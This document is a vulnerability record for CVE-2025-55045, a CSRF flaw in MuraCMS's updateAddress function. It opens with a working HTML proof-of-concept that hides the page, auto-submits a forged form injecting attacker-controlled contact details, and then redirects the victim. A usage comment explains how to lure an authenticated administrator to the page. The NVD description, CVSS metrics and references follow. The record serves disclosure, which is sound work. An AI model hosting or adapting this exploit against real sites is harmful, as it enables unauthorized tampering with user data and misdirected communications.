CVE-2025-55045

<!-- CVE-2025-55045 CSRF PoC - MuraCMS updateAddress --> <!DOCTYPE html> <html> <head> <title>Loading...</title> <style>body{display:none;}</style> </head> <body> <h1>MuraCMS updateAddress CSRF Exploit</h1> <!-- Auto-submit form to add malicious address --> <form id="csrfForm" action="[MURACMS_BASE_URL]/cUsers.updateAddress" method="POST"> <input type="hidden" name="addressID" value="0"> <input type="hidden" name="addressType" value="shipping"> <input type="hidden" name="firstName" value="Attacker"> <input type="hidden" name="lastName" value="Injected"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="phone" value="+1-555-ATTACKER"> <input type="hidden" name="address1" value="123 Malicious St"> <input type="hidden" name="address2" value=""> <input type="hidden" name="city" value="AttackerCity"> <input type="hidden" name="state" value="XX"> <input type="hidden" name="postalCode" value="12345"> <input type="hidden" name="country" value="US"> <input type="hidden" name="isPrimary" value="1"> </form> <script> // Auto-submit the CSRF form when page loads document.getElementById('csrfForm').submit(); // Optional: Redirect after exploitation setTimeout(function() { window.location.href = 'https://www.google.com'; }, 1000); </script> </body> </html> <!-- Usage: Host this HTML on attacker-controlled server and lure authenticated MuraCMS administrator to visit the page. The form will auto-submit using the admin's session, adding/modifying address records without their knowledge. This PoC demonstrates the lack of CSRF protection in cUsers.updateAddress. -->

{"cve": {"id": "CVE-2025-55045", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:23.670", "lastModified": "2026-03-20T18:10:39.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The update address CSRF vulnerability in MuraCMS through 10.1.10 allows attackers to manipulate user address information through CSRF. The vulnerable cUsers.updateAddress function lacks CSRF token validation, enabling malicious websites to forge requests that add, modify, or delete user addresses when an authenticated administrator visits a crafted webpage. Successful exploitation of the update address CSRF vulnerability results in unauthorized manipulation of user address information within the MuraCMS system, potentially compromising user data integrity and organizational communications. When an authenticated administrator visits a malicious webpage containing the CSRF exploit, their browser automatically submits a hidden form that can add malicious addresses with attacker-controlled email addresses and phone numbers, update existing addresses to redirect communications to attacker-controlled locations or deleted legitimate address records to disrupt business operations. This can lead to misdirected sensitive communications, compromise of user privacy through injection of attacker contact information, disruption of legitimate business correspondence, and potential social engineering attacks via the corrupted address data."}, {"lang": "es", "value": "La vulnerabilidad CSRF de actualización de dirección en MuraCMS hasta la versión 10.1.10 permite a los atacantes manipular la información de dirección del usuario a través de CSRF. La función vulnerable cUsers.updateAddress carece de validación de token CSRF, lo que permite a sitios web maliciosos forjar solicitudes que añaden, modifican o eliminan direcciones de usuario cuando un administrador autenticado visita una página web diseñada. La explotación exitosa de la vulnerabilidad CSRF de actualización de dirección resulta en la manipulación no autorizada de la información de dirección del usuario dentro del sistema MuraCMS, comprometiendo potencialmente la integridad de los datos del usuario y las comunicaciones organizacionales. Cuando un administrador autenticado visita una página web maliciosa que contiene el exploit CSRF, su navegador envía automáticamente un formulario oculto que puede añadir direcciones maliciosas con direcciones de correo electrónico y números de teléfono controlados por el atacante, actualizar direcciones existentes para redirigir comunicaciones a ubicaciones controladas por el atacante o eliminar registros de direcciones legítimas para interrumpir las operaciones comerciales. Esto puede llevar a comunicaciones sensibles mal dirigidas, compromiso de la privacidad del usuario mediante la inyección de información de contacto del atacante, interrupción de la correspondencia comercial legítima y posibles ataques de ingeniería social a través de los datos de dirección corruptos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}]}}